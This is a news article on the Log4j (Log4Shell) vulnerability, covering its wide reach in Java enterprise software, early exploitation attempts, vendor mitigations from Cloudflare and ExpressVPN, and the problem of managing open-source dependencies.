Since the Log4j (CVE-2021-44228) flaw was discovered last week, the cybersecurity community has gone into overdrive to identify vulnerable applications, detect potential attacks, and mitigate exploits in any way possible. Nonetheless, the exploit will almost certainly be used in serious hacks.
Researchers have seen attackers use the Log4j vulnerability to install ransomware on honeypot servers, which are machines that are intentionally made vulnerable in order to track down new threats. Nearly half of the corporate networks that one cybersecurity firm was monitoring had seen attempts to exploit the flaw. Early on, the CEO of Cloudflare, a website and network security provider, stated that the threat was so severe that the company would provide free firewall protection to all customers, even those who had not paid for it. However, concrete information on exploitation in the wild is scarce, owing to the fact that victims are either unaware of or unwilling to publicly acknowledge that their systems have been hacked.
What is certain is that the vulnerability’s scope is enormous. At the time of publication, the Cybersecurity and Infrastructure Security Agency (CISA) had compiled a list of affected software that numbered more than 500 items and was limited to only enterprise software platforms. A comprehensive list of all affected applications would undoubtedly number in the thousands.
Log4Shell is affecting an unusually large portion of the internet, even by the standards of high-profile vulnerabilities. It reflects the fact that the Java programming language is widely used in enterprise software, and the Log4j library is widely used in Java software.
According to analysts, the discovery of an easily exploitable bug in a primarily enterprise-oriented language is part of a “nearly perfect storm” surrounding the Log4j vulnerability. Multiple programs containing the vulnerable library — in some cases, multiple versions of the same program — could be running at the same time in a single company.
Cloudflare was one company that acted quickly, according to Graham-Cumming, adding new rules to its firewall that blocked HTTP requests with strings similar to the Log4j attack code. ExpressVPN also updated its product to protect against Log4Shell, changing VPN rules to block all outgoing traffic on LDAP ports, which the exploit uses to fetch resources from remote URLs and download them onto a vulnerable machine.
Heartbleed, one of the most recent internet security flaws, was also caused by a bug in the widely used open-source library OpenSSL. Following the discovery of the bug, tech giants such as Google, Microsoft, and Facebook pledged to invest more in open source projects that were critical to the internet’s infrastructure. However, in the aftermath of the Log4j debacle, it’s clear that managing dependencies is still a major security issue — one that we’re not close to solving.